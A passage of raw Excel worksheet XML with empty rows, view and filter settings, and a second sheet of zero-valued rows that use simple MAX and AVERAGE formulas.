      <c r="C271"/>
      <c r="D271"/>
      <c r="E271"/>
      <c r="F271"/>
      <c r="G271"/>
      <c r="H271"/>
      <c r="I271"/>
      <c r="J271"/>
      <c r="K271"/>
    </row>
    <row r="272" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A272"/>
      <c r="B272"/>
      <c r="C272"/>
      <c r="D272"/>
      <c r="E272"/>
      <c r="F272"/>
      <c r="G272"/>
      <c r="H272"/>
      <c r="I272"/>
      <c r="J272"/>
      <c r="K272"/>
    </row>
    <row r="273" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A273"/>
      <c r="B273"/>
      <c r="C273"/>
      <c r="D273"/>
      <c r="E273"/>
      <c r="F273"/>
      <c r="G273"/>
      <c r="H273"/>
      <c r="I273"/>
      <c r="J273"/>
      <c r="K273"/>
    </row>
    <row r="274" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A274"/>
      <c r="B274"/>
      <c r="C274"/>
      <c r="D274"/>
      <c r="E274"/>
      <c r="F274"/>
      <c r="G274"/>
      <c r="H274"/>
      <c r="I274"/>
      <c r="J274"/>
      <c r="K274"/>
    </row>
    <row r="275" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A275"/>
      <c r="B275"/>
      <c r="C275"/>
      <c r="D275"/>
      <c r="E275"/>
      <c r="F275"/>
      <c r="G275"/>
      <c r="H275"/>
      <c r="I275"/>
      <c r="J275"/>
      <c r="K275"/>
    </row>
    <row r="276" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A276"/>
      <c r="B276"/>
      <c r="C276"/>
      <c r="D276"/>
      <c r="E276"/>
      <c r="F276"/>
      <c r="G276"/>
      <c r="H276"/>
      <c r="I276"/>
      <c r="J276"/>
      <c r="K276"/>
    </row>
    <row r="277" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A277"/>
      <c r="B277"/>
      <c r="C277"/>
      <c r="D277"/>
      <c r="E277"/>
      <c r="F277"/>
      <c r="G277"/>
      <c r="H277"/>
      <c r="I277"/>
      <c r="J277"/>
      <c r="K277"/>
    </row>
    <row r="278" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A278"/>
      <c r="B278"/>
      <c r="C278"/>
      <c r="D278"/>
      <c r="E278"/>
      <c r="F278"/>
      <c r="G278"/>
      <c r="H278"/>
      <c r="I278"/>
      <c r="J278"/>
      <c r="K278"/>
    </row>
    <row r="279" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A279"/>
      <c r="B279"/>
      <c r="C279"/>
      <c r="D279"/>
      <c r="E279"/>
      <c r="F279"/>
      <c r="G279"/>
      <c r="H279"/>
      <c r="I279"/>
      <c r="J279"/>
      <c r="K279"/>
    </row>
    <row r="280" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A280"/>
      <c r="B280"/>
      <c r="C280"/>
      <c r="D280"/>
      <c r="E280"/>
      <c r="F280"/>
      <c r="G280"/>
      <c r="H280"/>
      <c r="I280"/>
      <c r="J280"/>
      <c r="K280"/>
    </row>
    <row r="281" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A281"/>
      <c r="B281"/>
      <c r="C281"/>
      <c r="D281"/>
      <c r="E281"/>
      <c r="F281"/>
      <c r="G281"/>
      <c r="H281"/>
      <c r="I281"/>
      <c r="J281"/>
      <c r="K281"/>
    </row>
    <row r="282" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A282"/>
      <c r="B282"/>
      <c r="C282"/>
      <c r="D282"/>
      <c r="E282"/>
      <c r="F282"/>
      <c r="G282"/>
      <c r="H282"/>
      <c r="I282"/>
      <c r="J282"/>
      <c r="K282"/>
    </row>
    <row r="283" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A283"/>
      <c r="B283"/>
      <c r="C283"/>
      <c r="D283"/>
      <c r="E283"/>
      <c r="F283"/>
      <c r="G283"/>
      <c r="H283"/>
      <c r="I283"/>
      <c r="J283"/>
      <c r="K283"/>
    </row>
    <row r="284" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A284"/>
      <c r="B284"/>
      <c r="C284"/>
      <c r="D284"/>
      <c r="E284"/>
      <c r="F284"/>
      <c r="G284"/>
      <c r="H284"/>
      <c r="I284"/>
      <c r="J284"/>
      <c r="K284"/>
    </row>
    <row r="285" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A285"/>
      <c r="B285"/>
      <c r="C285"/>
      <c r="D285"/>
      <c r="E285"/>
      <c r="F285"/>
      <c r="G285"/>
      <c r="H285"/>
      <c r="I285"/>
      <c r="J285"/>
      <c r="K285"/>
    </row>
    <row r="286" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A286"/>
      <c r="B286"/>
      <c r="C286"/>
      <c r="D286"/>
      <c r="E286"/>
      <c r="F286"/>
      <c r="G286"/>
      <c r="H286"/>
      <c r="I286"/>
      <c r="J286"/>
      <c r="K286"/>
    </row>
    <row r="287" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A287"/>
      <c r="B287"/>
      <c r="C287"/>
      <c r="D287"/>
      <c r="E287"/>
      <c r="F287"/>
      <c r="G287"/>
      <c r="H287"/>
      <c r="I287"/>
      <c r="J287"/>
      <c r="K287"/>
    </row>
    <row r="288" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A288"/>
      <c r="B288"/>
      <c r="C288"/>
      <c r="D288"/>
      <c r="E288"/>
      <c r="F288"/>
      <c r="G288"/>
      <c r="H288"/>
      <c r="I288"/>
      <c r="J288"/>
      <c r="K288"/>
    </row>
    <row r="289" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A289"/>
      <c r="B289"/>
      <c r="C289"/>
      <c r="D289"/>
      <c r="E289"/>
      <c r="F289"/>
      <c r="G289"/>
      <c r="H289"/>
      <c r="I289"/>
      <c r="J289"/>
      <c r="K289"/>
    </row>
    <row r="290" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A290"/>
      <c r="B290"/>
      <c r="C290"/>
      <c r="D290"/>
      <c r="E290"/>
      <c r="F290"/>
      <c r="G290"/>
      <c r="H290"/>
      <c r="I290"/>
      <c r="J290"/>
      <c r="K290"/>
    </row>
    <row r="291" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A291"/>
      <c r="B291"/>
      <c r="C291"/>
      <c r="D291"/>
      <c r="E291"/>
      <c r="F291"/>
      <c r="G291"/>
      <c r="H291"/>
      <c r="I291"/>
      <c r="J291"/>
      <c r="K291"/>
    </row>
    <row r="292" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A292"/>
      <c r="B292"/>
      <c r="C292"/>
      <c r="D292"/>
      <c r="E292"/>
      <c r="F292"/>
      <c r="G292"/>
      <c r="H292"/>
      <c r="I292"/>
      <c r="J292"/>
      <c r="K292"/>
    </row>
    <row r="293" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A293"/>
      <c r="B293"/>
      <c r="C293"/>
      <c r="D293"/>
      <c r="E293"/>
      <c r="F293"/>
      <c r="G293"/>
      <c r="H293"/>
      <c r="I293"/>
      <c r="J293"/>
      <c r="K293"/>
    </row>
    <row r="294" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A294"/>
      <c r="B294"/>
      <c r="C294"/>
      <c r="D294"/>
      <c r="E294"/>
      <c r="F294"/>
      <c r="G294"/>
      <c r="H294"/>
      <c r="I294"/>
      <c r="J294"/>
      <c r="K294"/>
    </row>
    <row r="295" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A295"/>
      <c r="B295"/>
      <c r="C295"/>
      <c r="D295"/>
      <c r="E295"/>
      <c r="F295"/>
      <c r="G295"/>
      <c r="H295"/>
      <c r="I295"/>
      <c r="J295"/>
      <c r="K295"/>
    </row>
    <row r="296" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A296"/>
      <c r="B296"/>
      <c r="C296"/>
      <c r="D296"/>
      <c r="E296"/>
      <c r="F296"/>
      <c r="G296"/>
      <c r="H296"/>
      <c r="I296"/>
      <c r="J296"/>
      <c r="K296"/>
    </row>
    <row r="297" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A297"/>
      <c r="B297"/>
      <c r="C297"/>
      <c r="D297"/>
      <c r="E297"/>
      <c r="F297"/>
      <c r="G297"/>
      <c r="H297"/>
      <c r="I297"/>
      <c r="J297"/>
      <c r="K297"/>
    </row>
    <row r="298" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A298"/>
      <c r="B298"/>
      <c r="C298"/>
      <c r="D298"/>
      <c r="E298"/>
      <c r="F298"/>
      <c r="G298"/>
      <c r="H298"/>
      <c r="I298"/>
      <c r="J298"/>
      <c r="K298"/>
    </row>
    <row r="299" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A299"/>
      <c r="B299"/>
      <c r="C299"/>
      <c r="D299"/>
      <c r="E299"/>
      <c r="F299"/>
      <c r="G299"/>
      <c r="H299"/>
      <c r="I299"/>
      <c r="J299"/>
      <c r="K299"/>
    </row>
    <row r="300" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A300"/>
      <c r="B300"/>
      <c r="C300"/>
      <c r="D300"/>
      <c r="E300"/>
      <c r="F300"/>
      <c r="G300"/>
      <c r="H300"/>
      <c r="I300"/>
      <c r="J300"/>
      <c r="K300"/>
    </row>
    <row r="301" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A301"/>
      <c r="B301"/>
      <c r="C301"/>
      <c r="D301"/>
      <c r="E301"/>
      <c r="F301"/>
      <c r="G301"/>
      <c r="H301"/>
      <c r="I301"/>
      <c r="J301"/>
      <c r="K301"/>
    </row>
    <row r="302" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A302"/>
      <c r="B302"/>
      <c r="C302"/>
      <c r="D302"/>
      <c r="E302"/>
      <c r="F302"/>
      <c r="G302"/>
      <c r="H302"/>
      <c r="I302"/>
      <c r="J302"/>
      <c r="K302"/>
    </row>
    <row r="303" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A303"/>
      <c r="B303"/>
      <c r="C303"/>
      <c r="D303"/>
      <c r="E303"/>
      <c r="F303"/>
      <c r="G303"/>
      <c r="H303"/>
      <c r="I303"/>
      <c r="J303"/>
      <c r="K303"/>
    </row>
    <row r="304" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A304"/>
      <c r="B304"/>
      <c r="C304"/>
      <c r="D304"/>
      <c r="E304"/>
      <c r="F304"/>
      <c r="G304"/>
      <c r="H304"/>
      <c r="I304"/>
      <c r="J304"/>
      <c r="K304"/>
    </row>
    <row r="305" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A305"/>
      <c r="B305"/>
      <c r="C305"/>
      <c r="D305"/>
      <c r="E305"/>
      <c r="F305"/>
      <c r="G305"/>
      <c r="H305"/>
      <c r="I305"/>
      <c r="J305"/>
      <c r="K305"/>
    </row>
    <row r="306" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A306"/>
      <c r="B306"/>
      <c r="C306"/>
      <c r="D306"/>
      <c r="E306"/>
      <c r="F306"/>
      <c r="G306"/>
      <c r="H306"/>
      <c r="I306"/>
      <c r="J306"/>
      <c r="K306"/>
    </row>
    <row r="307" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A307"/>
      <c r="B307"/>
      <c r="C307"/>
      <c r="D307"/>
      <c r="E307"/>
      <c r="F307"/>
      <c r="G307"/>
      <c r="H307"/>
      <c r="I307"/>
      <c r="J307"/>
      <c r="K307"/>
    </row>
    <row r="308" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A308"/>
      <c r="B308"/>
      <c r="C308"/>
      <c r="D308"/>
      <c r="E308"/>
      <c r="F308"/>
      <c r="G308"/>
      <c r="H308"/>
      <c r="I308"/>
      <c r="J308"/>
      <c r="K308"/>
    </row>
    <row r="309" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A309"/>
      <c r="B309"/>
      <c r="C309"/>
      <c r="D309"/>
      <c r="E309"/>
      <c r="F309"/>
      <c r="G309"/>
      <c r="H309"/>
      <c r="I309"/>
      <c r="J309"/>
      <c r="K309"/>
    </row>
    <row r="310" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A310"/>
      <c r="B310"/>
      <c r="C310"/>
      <c r="D310"/>
      <c r="E310"/>
      <c r="F310"/>
      <c r="G310"/>
      <c r="H310"/>
      <c r="I310"/>
      <c r="J310"/>
      <c r="K310"/>
    </row>
  </sheetData>
  <autoFilter ref="A1:Y220" xr:uid="{00000000-0009-0000-0000-000003000000}"/>
  <customSheetViews>
    <customSheetView guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" scale="120" showGridLines="0" showAutoFilter="1" hiddenColumns="1">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozenSplit"/>
      <selection pane="bottomLeft" activeCell="I3" sqref="I3"/>
      <pageMargins left="0" right="0" top="0" bottom="0" header="0" footer="0"/>
      <pageSetup orientation="portrait" r:id="rId1"/>
      <autoFilter ref="A1:Y170" xr:uid="{00000000-0000-0000-0000-000000000000}"/>
    </customSheetView>
  </customSheetViews>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" r:id="rId2"/>
  <ignoredErrors>
    <ignoredError sqref="N2:N170 P2:P170 R2:R170 T2:T170 V2:V170 X2:X17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3"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScale="114" zoomScaleNormal="110" zoomScalePageLayoutView="110" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="B34" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="A3" sqref="A3"/>
      <selection pane="bottomRight" activeCell="G55" sqref="G55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.3984375" defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="30.3984375" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="4.86328125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="4.1328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="11.1328125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="4" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="4" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="4" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="4" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="24" max="24" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="26" max="26" width="4" bestFit="1" customWidth="1"/>
    <col min="27" max="27" width="11.86328125" bestFit="1" customWidth="1"/>
    <col min="28" max="28" width="10.1328125" bestFit="1" customWidth="1"/>
    <col min="29" max="29" width="9.1328125" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="4" bestFit="1" customWidth="1"/>
    <col min="34" max="34" width="4" bestFit="1" customWidth="1"/>
    <col min="38" max="38" width="4" bestFit="1" customWidth="1"/>
    <col min="42" max="42" width="4" bestFit="1" customWidth="1"/>
    <col min="46" max="46" width="4" bestFit="1" customWidth="1"/>
    <col min="50" max="50" width="4.3984375" customWidth="1"/>
    <col min="54" max="54" width="4" bestFit="1" customWidth="1"/>
    <col min="58" max="58" width="4" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="14.25" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A1" s="11"/>
      <c r="B1" s="11"/>
      <c r="C1" s="68"/>
      <c r="D1" s="69"/>
      <c r="E1" s="69"/>
      <c r="F1" s="70"/>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A2" s="15" t="s">
        <v>280</v>
      </c>
      <c r="B2" s="15" t="s">
        <v>1144</v>
      </c>
      <c r="C2" s="22" t="s">
        <v>236</v>
      </c>
      <c r="D2" s="22" t="s">
        <v>238</v>
      </c>
      <c r="E2" s="22" t="s">
        <v>237</v>
      </c>
      <c r="F2" s="22" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A3" s="21" t="s">
        <v>1146</v>
      </c>
      <c r="B3" s="21">
        <f>MAX(F3)</f>
        <v>0</v>
      </c>
      <c r="C3" s="30">
        <v>0</v>
      </c>
      <c r="D3" s="30">
        <v>0</v>
      </c>
      <c r="E3" s="30">
        <v>0</v>
      </c>
      <c r="F3" s="30">
        <f>IF(C$1&lt;&gt;0,AVERAGE(C3:E3),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A4" s="21" t="s">
        <v>1147</v>
      </c>
      <c r="B4" s="21">
        <f t="shared" ref="B4:B49" si="0">MAX(F4)</f>
        <v>0</v>
      </c>
      <c r="C4" s="30">
        <v>0</v>
      </c>
      <c r="D4" s="30">
        <v>0</v>
      </c>
      <c r="E4" s="30">
        <v>0</v>
      </c>
      <c r="F4" s="30">
        <f>IF(C$1&lt;&gt;0,AVERAGE(C4:E4),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A5" s="21" t="s">
        <v>1148</v>
      </c>
      <c r="B5" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C5" s="30">
        <v>0</v>
      </c>
      <c r="D5" s="30">
        <v>0</v>
      </c>
      <c r="E5" s="30">
        <v>0</v>
      </c>
      <c r="F5" s="30">
        <f t="shared" ref="F5:F49" si="1">IF(C$1&lt;&gt;0,AVERAGE(C5:E5),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A6" s="21" t="s">
        <v>377</v>
      </c>
      <c r="B6" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C6" s="30">
        <v>0</v>
      </c>
      <c r="D6" s="30">
        <v>0</v>
      </c>
      <c r="E6" s="30">
        <v>0</v>
      </c>
      <c r="F6" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A7" s="21" t="s">
        <v>472</v>
      </c>
      <c r="B7" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C7" s="30">
        <v>0</v>
      </c>
      <c r="D7" s="30">
        <v>0</v>
      </c>
      <c r="E7" s="30">
        <v>0</v>
      </c>
      <c r="F7" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A8" s="21" t="s">
        <v>1149</v>
      </c>
      <c r="B8" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C8" s="30">
        <v>0</v>
      </c>
      <c r="D8" s="30">
        <v>0</v>
      </c>
      <c r="E8" s="30">
        <v>0</v>
      </c>
      <c r="F8" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A9" s="21" t="s">
        <v>1150</v>
      </c>
      <c r="B9" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C9" s="30">
        <v>0</v>
      </c>
      <c r="D9" s="30">
        <v>0</v>
      </c>
      <c r="E9" s="30">
        <v>0</v>
      </c>
      <c r="F9" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A10" s="21" t="s">
        <v>1151</v>
      </c>
      <c r="B10" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C10" s="30">
        <v>0</v>
      </c>
      <c r="D10" s="30">
        <v>0</v>
      </c>
      <c r="E10" s="30">
        <v>0</v>
      </c>
      <c r="F10" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A11" s="21" t="s">
        <v>1152</v>
      </c>
      <c r="B11" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C11" s="30">
        <v>0</v>
      </c>
      <c r="D11" s="30">
        <v>0</v>
      </c>
      <c r="E11" s="30">
        <v>0</v>
      </c>
      <c r="F11" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A12" s="21" t="s">
        <v>1153</v>
      </c>
      <c r="B12" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C12" s="30">
        <v>0</v>
      </c>
      <c r="D12" s="30">
        <v>0</v>
      </c>
      <c r="E12" s="30">
        <v>0</v>
      </c>
      <c r="F12" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A13" s="21" t="s">
        <v>1154</v>
      </c>
      <c r="B13" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C13" s="30">
        <v>0</v>
      </c>
      <c r="D13" s="30">
        <v>0</v>
      </c>
      <c r="E13" s="30">
        <v>0</v>
      </c>
      <c r="F13" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A14" s="21" t="s">
        <v>1155</v>
      </c>
      <c r="B14" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C14" s="30">
        <v>0</v>
      </c>
      <c r="D14" s="30">
        <v>0</v>
      </c>
      <c r="E14" s="30">
        <v>0</v>
      </c>
      <c r="F14" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A15" s="21" t="s">
        <v>1156</v>
      </c>
      <c r="B15" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C15" s="30">
        <v>0</v>
      </c>
      <c r="D15" s="30">
        <v>0</v>
      </c>
      <c r="E15" s="30">
        <v>0</v>
      </c>
      <c r="F15" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A16" s="21" t="s">
        <v>1157</v>
      </c>
      <c r="B16" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C16" s="30">
        <v>0</v>
      </c>
      <c r="D16" s="30">
        <v>0</v>
      </c>
      <c r="E16" s="30">
        <v>0</v>
      </c>
      <c r="F16" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A17" s="21" t="s">
        <v>676</v>
      </c>
      <c r="B17" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C17" s="30">
        <v>0</v>
      </c>
      <c r="D17" s="30">
        <v>0</v>
      </c>
      <c r="E17" s="30">
        <v>0</v>
      </c>
      <c r="F17" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A18" s="21" t="s">
        <v>1158</v>
      </c>
      <c r="B18" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C18" s="30">
        <v>0</v>
      </c>
      <c r="D18" s="30">
        <v>0</v>
      </c>
      <c r="E18" s="30">
        <v>0</v>
      </c>
      <c r="F18" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A19" s="21" t="s">
        <v>1159</v>
      </c>
      <c r="B19" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C19" s="30">
        <v>0</v>
      </c>
      <c r="D19" s="30">
        <v>0</v>
      </c>
      <c r="E19" s="30">
        <v>0</v>
      </c>
      <c r="F19" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A20" s="21" t="s">
        <v>1160</v>
      </c>
      <c r="B20" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C20" s="30">
        <v>0</v>
      </c>
      <c r="D20" s="30">
        <v>0</v>
      </c>
      <c r="E20" s="30">
        <v>0</v>
      </c>
      <c r="F20" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A21" s="21" t="s">
        <v>1161</v>
      </c>
      <c r="B21" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C21" s="30">
        <v>0</v>
      </c>
      <c r="D21" s="30">
        <v>0</v>
      </c>
      <c r="E21" s="30">
        <v>0</v>
      </c>
      <c r="F21" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A22" s="21" t="s">
        <v>1162</v>
      </c>
      <c r="B22" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C22" s="30">
        <v>0</v>
      </c>
      <c r="D22" s="30">
        <v>0</v>
      </c>
      <c r="E22" s="30">
        <v>0</v>
      </c>
      <c r="F22" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A23" s="21" t="s">
        <v>537</v>
      </c>
      <c r="B23" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C23" s="30">
        <v>0</v>
      </c>
      <c r="D23" s="30">
        <v>0</v>
      </c>
      <c r="E23" s="30">
        <v>0</v>
      </c>
      <c r="F23" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A24" s="21" t="s">
        <v>1163</v>
      </c>
      <c r="B24" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C24" s="30">
        <v>0</v>
      </c>
      <c r="D24" s="30">
        <v>0</v>
      </c>
      <c r="E24" s="30">
        <v>0</v>
      </c>
      <c r="F24" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A25" s="21" t="s">
        <v>1164</v>
      </c>
      <c r="B25" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C25" s="30">
        <v>0</v>
      </c>
      <c r="D25" s="30">
        <v>0</v>
      </c>
      <c r="E25" s="30">
        <v>0</v>
      </c>
      <c r="F25" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A26" s="21" t="s">
        <v>1165</v>
      </c>
      <c r="B26" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C26" s="30">
        <v>0</v>
      </c>
      <c r="D26" s="30">
        <v>0</v>
      </c>
      <c r="E26" s="30">
        <v>0</v>
      </c>
      <c r="F26" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A27" s="21" t="s">
        <v>1166</v>
      </c>
      <c r="B27" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C27" s="30">
        <v>0</v>
      </c>
      <c r="D27" s="30">
        <v>0</v>
      </c>
      <c r="E27" s="30">
        <v>0</v>
      </c>
      <c r="F27" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A28" s="21" t="s">
        <v>1089</v>
      </c>
      <c r="B28" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C28" s="30">
        <v>0</v>
      </c>
      <c r="D28" s="30">
        <v>0</v>
      </c>
      <c r="E28" s="30">
        <v>0</v>
      </c>
      <c r="F28" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A29" s="21" t="s">
        <v>1167</v>
      </c>
      <c r="B29" s="21">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C29" s="30">
        <v>0</v>
      </c>
      <c r="D29" s="30">
        <v>0</v>
      </c>
      <c r="E29" s="30">
        <v>0</v>
      </c>
      <c r="F29" s="30">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
